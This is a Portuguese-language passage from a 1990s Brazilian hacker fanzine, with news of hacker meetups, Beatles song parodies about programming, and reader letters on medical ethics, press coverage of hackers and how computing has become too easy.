com o Hack-Tic e o Virus Report. Por essas e outras que nao transformei o Barata Eletrica num evento comercial.. ou mesmo criar uma revista com nome real, menos maldito. Quem quiser maiores informac⌡es, da uma olhada no www.2600.com . Minha opiniao e que o cara vai se safar dessa, o dificil vai ser o pessoal fazer assinaturas por uns tempos. A proxima edicao vai atrasar, isso ta avisado na pagina. --------------------------------------------------------------------------- Encontros de Hackers em Sao Paulo, Rio e Belo Horizonte: Em Sao Paulo, comecaram a acontecer, embora nao em horarios e datas regulares, encontros de hackers. Aqueles que se interessarem, esta sendo criada uma lista para a divulgacao desses encontros. Provavelmente vai rolar na lista hackers.braz ou qualquer outra que estiver disponivel. Como e que estao sendo? Bom, tem gente comparecendo e nao so wannabes. Mas como de vez em quando pinta um "desencontro", acho prematuro eu chegar aqui e divulgar pagina tal, provedor tal, pelo simples fato que: 1) ainda acho cedo 2) esse fanzine fica em html, zip e txt por tudo quanto e' lugar do mundo. Falar que bar tal ou pagina tal esta' acontecendo isso ou aquilo, e uma verdadeira propaganda pra qualquer estabelecimento. Minha pagina no geocities continua recebendo visitas, apesar de ser de outro cara, agora ( a Geocities resolveu detonar com minha pagina no SiliconValley/5620) 3) Quero fazer uma pagina com o local de encontros hackers no Brasil inteiro. Vai fica na mesma pagina em que estiver os ultimos numeros do Barata Eletrica. 4) ┌ltimo. Quem e fussador, acaba descobrindo sozinho. Aqueles em outros estados que quiserem que eu divulgue encontros (detalhe: de preferencia a mocada que ja faz encontros 2600) me avisem. --------------------------------------------------------------------------- Se os Beatles fossem programadores (contribuicao da lista de piadas) YESTERDAY Yesterday, All those backups seemed a waste of pay. Now my database has gone away. Oh I believe in yesterday. Suddenly, There's not half the files there used to be, And there's a milestone hanging over me The system crashed so suddenly. I pushed something wrong What it was I could not say. Now all my data's gone and I long for yesterday-ay-ay-ay. Yesterday, The need for back-ups seemed so far away. I knew my data was all here to stay, Now I believe in yesterday. ============================================ Songs to program by... Eleanor Rigby ------------- Eleanor Rigby Sits at the keyboard And waits for a line on the screen Lives in a dream Waits for a signal Finding some code That will make the machine do some more. What is it for? All the lonely users, where do they all come from? All the lonely users, why does it take so long? Guru MacKenzie Typing the lines of a program that no one will run; Isn't it fun? Look at him working, Munching some chips as he waits for the code to compile; It takes a while... All the lonely users, where do they all come from? All the lonely users, why does it take so long? Eleanor Rigby Crashes the system and loses 6 hours of work; Feels like a jerk. Guru MacKenzie Wiping the crumbs off the keys as he types in the code; Nothing will load. All the lonely users, where do they all come from? All the lonely users, why does it take so long? =================================== Unix Man (Nowhere Man) -------- He's a real UNIX Man Sitting in his UNIX LAN Making all his UNIX plans For nobody. Knows the blocksize from du(1) Cares not where /dev/null goes to Isn't he a bit like you And me? UNIX Man, please listen(2) My lpd(8) is missin' UNIX Man The wo-o-o-orld is at(1) your command. He's as wise as he can be Uses lex and yacc and C UNIX Man, can you help me At all? UNIX Man, don't worry Test with time(1), don't hurry UNIX Man The new kernel boots, just like you had planned. He's a real UNIX Man Sitting in his UNIX LAN Making all his UNIX plans For nobody ... Making all his UNIX plans For nobody. ================================== Something --------- Something in the way it fails, Defies the algorithm's logic! Something in the way it coredumps... I don't want to leave it now I'll fix this problem somehow Somewhere in the memory I know, A pointer's got to be corrupted. Stepping in the debugger will show me... I don't want to leave it now I'm too close to leave it now You're asking me can this code go? I don't know, I don't know... What sequence causes it to blow? I don't know, I don't know... Something in the initializing code? And all I have to do is think of it! Something in the listing will show me... I don't want to leave it now I'll fix this tonight I vow! --------------------------------------------------------------------------- CORREIO ELETR╘NICO: Subject: Criticas Li sua materia, e esta e uma parte dela: "Do jeito que esta a situagco i atualmente, i (ou vai ser) um perigo entrar em coma num hospital qualquer. Sua carteira de identidade nco fala que vocj faz parte daqueles que acreditam em "doar" seus orgcos. Midico pensa: "vai custar X manter o cara vivo, mas fulano na fila precisando de um rim vai me dar Y se o cara morrer". I lei. O fato de que o midico dispts de seus orgcos possivelmente receber uma propina (nco sei se a classe midica ganha pouco a ponto de pensar que vale a pena declarar a morte cerebral de alguim para receber uma grana, isso i fruto da minha imaginagco) nco conta muito diante do fato de que existe uma lei permitindo lances relativos." Infelizmente, nao concordo com vc. O que vc escreveu ai em cima e muito comprometedor. Uma denuncia dessas pode te causar muito problemas, com certeza desnecessarios. Nao sou medico, fique tranquilo. [..] O caso do medico ai em cima e um deles. Vc vive defendendo a classe hacker. Eu concordo. Mas, com uma materia dessas, vc nivel uma classe profissional das mais exigidas senao a maior, como a imprensa faz quando aquele adolescente poe fotos de sacanagem na pagina da Scottlan Yard. Ou quebra a senha de uma cartao de credito de um terceiro. E olha que sao fatos menores. Nao vou dizer que nao existem erros. Pelo contrario, erros existem aos montes. Muitos sao prejudiciais, sim. Mas nao posso concordar que seja perigo entrar em coma em um hospital. A menos que existam crimes. E crimes contra a vida, os maiores de todos. A identidade diz se a pessoa e doadora ou nao. Violando isso, 1 crime. Deixando a pessoa morrer, 2 crimes. Assassinato e quebra de juramento. A familia permitindo a aceitar propina, o maior de todos, a sovinice, a ganancia. Ja tive familiares que lutaram ate o fim pela vida de seus parentes. E, nao posso negar que muitos medicos salvaram vidas, e se nao o conseguiram, tentaram ate o fim. Sou prova viva disto. [..] Um grando abraco e espero poder me comunicar melhor com vc. Fabiano B??? Resposta: Bom, como dizia Jack (o estripador): "vamos por partes". Na maior parte do texto eu nao acusei, eu sugeri a hipotese. Mesmo que a classe medica resolvesse me processar nesse caso especifico por calunia e difamacao, ia ser interessante. Porque nao sou o unico que aventou essa hipotese. Tem gente muito mais capacitada do que eu.. Inclusive teve uma materia na revista "Caros Amigos" (no 6, setembro 97)- uma entrevista com o autor do livro "Mercado Humano - estudo bioetico da compra e venda de partes do corpo", Volnei Garrafa Giovanni Berlinguer. Um dos entrevistadores, George Bourdokan relatou ter feito 1 programa Globo-Reporter em 1980 sobre roubo de orgaos em Botucatu, onde 1 moca acordou 1 mes depois sem as corneas. O programa nao teria ido ao ar por ser "muito pesado". Eu ja respondi essa carta em separado, mas se alguem mais ficou curioso por essa questao, vai ai o fato de que nao tirei essa hipotese da minha cabeca, nem e ficcao cientifica. Em varios casos, a pratica da medicina "pode" ser um crime que compensa. Um exemplo muito pior e que nunca parei pra averiguar e que varios casos de internacao na UTI sao desnecessarios: o paciente vai morrer mesmo e pra tirar alguma grana da familia, os medicos falam que o caso ainda tem chance de recuperacao. A assistente de enfermagem ou instrumentadora (sei la, faz tanto tempo) que me falou isso, disse que o pessoal chama a sala pra esses casos desenganados de "antecamara do inferno". Entre eles, o pessoal do hospital. Claro que isso veio de alguem que saiu da profissao, pode ser mentira ou caso isolado. Essa menina tambem me falou que em nenhum hospital particular, se voce perguntar na recepcao, medicos, etc.. existe uma sala para os desenganados. Claro, o paciente desenganado nao precisa de UTI ou tratamentos caros que dao lucro pro hospital. Porque o Brasil e um dos campe⌡es de cesarianas? Vaidade? Nao so isso, a cesaria e mais cara do que parto natural. Tambem ja ouvi falar de varias lendas urbanas onde a moral e a mesma: o medico ganha mais para amputar ate o joelho, do que so o pe... Ouvi isso de diferentes classes sociais. Pode ser lenda. Mas ja vi na revista VEJA inclusive, reportagens sobre "erros medicos" envolvendo transplantes. Houve um escandalo internacional envolvendo esterilizacao forcada de doentes mentais na Suecia. A China estaria vendendo orgaos de prisioneiros politicos executados. Se la fazem monstruosidades desse tipo, em paises do primeiro e do terceiro mundo, sera que nao fazem aqui? --------------------------------------------------------------------------- CARTA DA GRANDE IMPRENSA Subject: Re: Seguranca e hacking na Internet D????? H?????? wrote: >=20 > Caro Derneval, >=20 > Sou um reporter do Caderno de Informarica da ????? de S.P. e estou > trabalhando em uma materia sobre seguranca e hackers (sem nenhuma > conotacao pejorativa) na Internet. Acho que seria interessante > desmistificar para o usuario "newbie", ou "wannabe", ou simplismente > domestico, o mundo do hacking na rede. Gostaria de poder trocar > informac⌡es com voce sobre o assunto. Caso isso nao seja possivel, > responda-me o quanto antes. A reportagem sera capa da edicao do dia ?? > de ???????mbro. >=20 > Se voce concordar, ficaria grato se voce respondesse αs seguintes > perguntas: >=20 > 1. Para voce o que sao e quais as principais diferencas entre hackers e > crackers? Seus perfis, etica e "modus operandi": >=20 > 2. Do que um hacker (ou cracker) e capaz? Voce acha que sua capacid= ade e > superestimada? Ou e a seguranca das Intranets que e superestimada? As > empresas estao preparadas? Os firewalls sao uma blindagem eficiente? >=20 > 3. Quais as formas basicas de invasao? Telef=F4nica, via Internet, = fisica, > por meio da "engenharia social" etc...? >=20 > 4. Qual a melhor seguranca para o usuario domestico? >=20 > 5. Do que um hacker (ou cracker precisa)? Equipamento basico, de hard e > soft, conhecimento de linguagens sistemas etc... >=20 > 6. Quais sao os alvos mais vulneraveis? E os mais procurados? >=20 > Se voce nao tiver tempo, ou paciencia, para me responder atraves de > e-mail, seria possivel conversarmos pelo telefone para que eu obtivesse > uma declaracao de sua parte? Ficaria muito grato pela colaboracao. Voce > deve saber como e dificil conseguir um pronunciamento de qualquer um dos > lados dessa questao. >=20 > Agradeco, >=20 > D???? H?????? > (reporter free-lancer > da ??????de ?. ?.) RESPOSTA: Esta primeira carta da uma ideia de quais sao as intenc⌡es da chamada "grande imprensa" em relacao ao assunto "HACKERS". Claro que a resposta foi negativa, seguida da explicacao de que apenas escrevo sobre o assunto. E "hacking" pra mim e explorar ao maximo os recursos do computador. Esse tipo de coisa. Ai veio a segunda carta. E com acentos, de novo (esse pessoal nao aprende.. nao se usa acentuacao nem cedilha na internet). Ah, sim, e nao foi a unica que recebi. Vai abaixo o meu REPLY para o segundo convite para discutir o assunto: Subject: Sua reportagem > Caro Derneval, > > Entendo a sua relutancia em colaborar com a minha reportagem ante a > abordagem pejorativa do hacking e a sua trajetoria -para falar a verdade > eu nao esperava que voce sequer me respondesse com a ojeriza que > qualquer um do meio sente com jornalistas "fucando" o tema hacking (voce Eu nao tenho condicoes de saber o que voce sentiu lendo o meu email. Mas como pintou uma reportagem sobre "contra-ataque dos crackers" ate' entendo sua argumentacao. > ve a relacao?). Contudo acho que voce tambem deveria tentar ver as > coisas de onde estou... > > Serei sincero ("quid pro quo", compreende?): sou um estudante de > ???????? de ?? anos que estou trabalhando ha cinco meses como > free-lancer do Caderno ????????? d? ????????? e nao sou nenhum graudo > de rabo preso com o establishment corporativo. Nao mantenho nenhum ???????? (vou te chamar desse jeito, nao sou bom para nomes), Voce tem ?? anos a menos do que eu. Eu nunca te vi. Nao tenho razoes para te odiar como pessoa. So' que, da mesma forma que foi relatado no artigo la' da revista ????????, eu adquiri uma relutancia para conversar com qualquer um do meio jornalistico. Pelo simples fato de que houve um numero de reportagens sobre o assunto e a grande maioria esmagadora foi de reportagens detonando com a imagem, para que eu vou assumir riscos? Algumas das reportagens que detonaram, como "Confidencias de um Cracker", teve gente me contatando antes. O editor passou para outra pessoa que nao se importava em detonar e falar mal de hackers. A ???????? ????? chegou ao cumulo de associar hackers com adolescentes chatos. Nao senhor. Nao quero colaborar com isso. Ainda mais quando estou em pleno processo de procurar emprego? > interesse em desvirtuar a imagem de um grupo que considero essencial > para que a informatica se preserve como um agente de livre-expressao. > Minha curiosidade por hacking veio muito antes de eu estar n? ?????? e > venho propondo esta pauta com meu editor por acreditar na sua > pertinencia para o usuario domestico diante das quet⌡es de seguranca na > rede, e para desmistificar o papel do hacking. Voce tem toda razao > quanto aos preconceitos editoriais, mas apesar d? m??? chefe (? edit?r? > ???????? ??????) nao considerar a questao da mesma forma como eu el? esta > me dando carta-branca para trabalhar esta materia para a capa de um > caderno daqui a ??? ???????. TUDO BEM. Hoje, a materia e' interessante. Voce sabia que houve uma conferencia de Hackers e fabricantes de virus em outubro de 94? Uma pusta duma conferencia de hackers la' na Argentina. Sabia que eu dei a dica para um cara chamado ??????? ??????, que trabalha (va?) ai' onde voce esta? Sabia que nao houve interesse nenhum dele nem antes nem depois em OUVIR o que eu tinha pra falar, uma vez que fui um dos 3 brasileiros que foi (isso, porque eu morava no mesmo conjunto habitacional que ele)? E' culpa sua? Nao, nao e' culpa sua. To contando essa historia p. te mostrar que quando alguem quer falar, a imprensa nao quer ouvir, ou porque nao tem tempo, ou porque nao considera a materia como interessante, nao ve publico para ela. (Por um outro lado, outro jornal concorrente de voces felizmente tinha alguem que se interessou e saiu algumas linhas do que rolou la' em Buenos Aires) Do meu ponto de vista, se voces(to falando a voce como representante do seu jornal, entenda que ha' uma diferenca) nao se interessaram por isso nem 94, nao se interessaram por isso em 95 quando fui para a Inglaterra e fui em outra conferencia, nao se interessaram por isso em agosto de 97, quando houve uma conferencia de hackers na Holanda (olha as dicas) por que diabos eu deveria dar atencao a voces agora? > Apesar de ser um assunto tabu no meio > venho entrevistando diversos especialistas (hackers em certo sentido) em > informatica, seguranca em redes, computacao bancaria, direito digital e > grupos de hackers eticos, profissionais (gostaria de saber sua opiniao > sobre esta atividade). E e claro que esta pauta tambem abarca o angulo Minha opiniao pessoal e' a que esta' no barata eletrica 16, no artigo sobre hackers e a midia. Pra resumir, acho que tem algum anunciante de firewall ou coisa do genero pagando p. ver uma materia dessas sair. E mais, o pessoal que vai se auto proclamar hackers vai falar que "matam a cobra e mostram o pau". Se brincar vai sair em letras bem miudinhas que o Barata Eletrica nao procura estimular vandalismo eletronico. A parte de vandalismo eletronico, provavelmente saira' em letras garrafais, com algum titulo bem marcante e um monte de links para fazer mail-bombs e coisa do genero.. duvido que publiquem que o NT 4.0 ta' cheio de furos que permitem um provedor ser hackeado ou que o Linux (sistema operacional preferido) e' bem mais estavel e compete como software para provedor sem ter nenhuma propaganda alem do boca-a-boca. > do adolescente vandalo (que nao e o mesmo que um hacker de fato, ao meu > ver), mas se estou entrando em contato com voce nao foi por associa-lo > com este perfil mas por respeito ao trabalho que o seu zine fez em > divulgar a cultura underground do hacking no Brasil, o que mereceu o > reconhecimento da 2600 americana. Claro que mereceu. Por varias raz⌡es que nao vem ao caso. Foi por saber que a imprensa nao teria interesse no assunto que acabei fazendo o primeiro fanzine brasileiro na Internet, era a Agencia Estado, Agencia Folha e Barata Eletrica na lista de publicacoes brasileiras na web. Por bem mais de 6 meses. Nunca ninguem d? ???????? teve interesse em me entrevistar por conta disso. Fizeram acho que duas ou tres materias sobre fanzines nacionais desde que comecei o Barata Eletrica. So' na ultima e' que o Barata Eletrica foi mencionado. E ainda assim erraram o URL. Voce tem culpa disso? Nao, nao e' culpa sua. > Nao estou lhe dando este esclarecimento para tentar demove-lo de sua > posicao -que, de certo modo, acho coerente- mas para que voce nao pense > que todos os jornalistas -mesmo um lammer inexperiente como eu- > trabalham de ma-fe. A impresa nao e so o meio onipresente e hegemenico > que voce enxerga de seu lado, mas caras pacatos, curiosos, "fucadores" > bem-intencionados, que estao tentando fazer algo autentico e construtivo > e que muitas vezes nao tem o poder para faze-lo. Eu confio tanto na imprensa quanto confio num colega hacker. Acho que todo mundo trabalha de boa fe', garantindo o salario no final do mes. > O que quero dizer e que talvez voce tenha um lugar nessa questao e que > se voce acha que todas as reportagens com esse tema sao estupidas, bem, > talvez em certos casos tenha sido pela falta da colaboracao de todas as > pessoas envolvidas... No meu caso, tenho a consciencia limpa. Parei de colaborar depois que vi as sacanagens que estava ajudando a fazer. A imprensa e' bem menos imparcial que apregoa. E todo editor fala que o reporter tem carta pra branca pra escrever o que quiser.. parece ate' que voce nao leu "O crime do Padre Amaro". Eu nao vou acreditar no que voce falar acerca disso.. > De qualquer maneira parabens pelo BE (quando sai um proximo numero?). > Em um mes, mais ou menos. > Caso voce mude de ideia, responda este e-mail ou me ligue n? ?????? > (011-????????????), das 13h αs 19h -no contato por voz da para se saber > melhor com quem se esta lidando. > Seu email ta' guardado. Sem ressentimentos. Quanto a usar o nome Barata Eletrica ou informacoes contidas, nele, fica livre qualquer referencia, nao to nem ai'. Quiser divulgar os links do Barata igualmente. Mas que fique claro que hackear para o Barata Eletrica e' conseguir acesso a informacao e explorar os limites da capacidade do computador. E' isso o que considero hacking e e' disso que falo no BE embora comente o computer underground. Valeu. > Um abraco, > > ??????? ??????? P.S. Quando eu finalmente fizer meu encontro de hackers ou achar que finalmente a imprensa nao esta mais usando os hackers como forma de explorar o assunto "vandalismo eletronico", ficarei feliz de ajudar qualquer reporter (que nao me queira retratar como hacker ou como vandalo eletronico). Tenho o maior respeito pela imprensa, quando cumpre o seu papel. --------------------------------------------------------------------------- From: "Luis Marcilio B.Oliveira" <marcilio@arcom.com.br> Subject: Re: Os wannabes de hoje e os de antigamente Luis Marcilio B.Oliveira wrote: > v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v > > Ola Derneval. > > To te escrevendo pra comentar um pensamento que tive quando relia as > primeiras edicoes do BE. > > O que eu acho e que hoje as coisas estao faceis demais. Os micros estao > muito poderosos e nao temos muita dificuldade mais para conseguir que as > coisas rodem. > > Isso as vezes me desanima um pouco. > > Nao temos mais a necessidade de ficar "indo fundo" no dos porque o dos nao > usa mais, nem ficar turbinando os micros, ja que fazer upgrade de memoria > ficou tao facil. > > Nao temos por que querer "enganar" a tarifacao da central telefonica para > acessar um bbs interessante, ja que todas estao disponiveis na Internet, > sem falar nos programinhas que as vezes vem ate compilados. > > Nao estou dizendo que aprender por aprender nao seja interesante, mas como > diz o ditado: a necessidade eh a mae da criatividade. > > Nao sou um hacker. Pelo que escrevi acima da pra perceber. Me falta > justamente o que escrevi acima. *Necessidade*. > > Tenho certeza que voce tem mais conhecimentos para comentar sobre o > assunto, portanto ficaria feliz em receber uma resposta. > > Um abraco > > Luis Marcilio > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.3ia > > mQBNAzR0YnUAAAECANiPz456+QRyhqbb++PkuwvDIqw78dXvyB7vTbbD1A+Tcknb > AFvPMkIKNDxFU9wpswv//VV5bk2SB8uvLUhbamEABRG0CG1hcmNpbGlviQBVAwUQ > NHRidQfLry1IW2phAQE+IwH/RsJj0ajVBXuxpGroluxlEPy3KeRg5uLmOrHZ7GAh > kwF75o6C4e/uvZP1cx5sSZ/ReF0JTpx7MYQHNI6VvE5z7g== > =FQUO > -----END PGP PUBLIC KEY BLOCK----- E', esse problema tambem me acontece.. tinha ate' um artigo sobre isso na 2600. Aconteceu comigo, inclusive. Eu arrumei um emprego onde acabei montando um servidor. Vou brincar de hackear outro servidor pra que? Pro outro sysop avisar pro meu patrao e me demitir? Agora to desempregado, mas nao me cortaram as contas, entao o problema continua.. Nao sei o que responder. Meu desafio agora e' arrumar 1 emprego. Talvez quando eu voltar a mexer com o Linux, reencontre os grandes desafios. Valeu. assinado: Derneval ---------------------------------------------------------------------------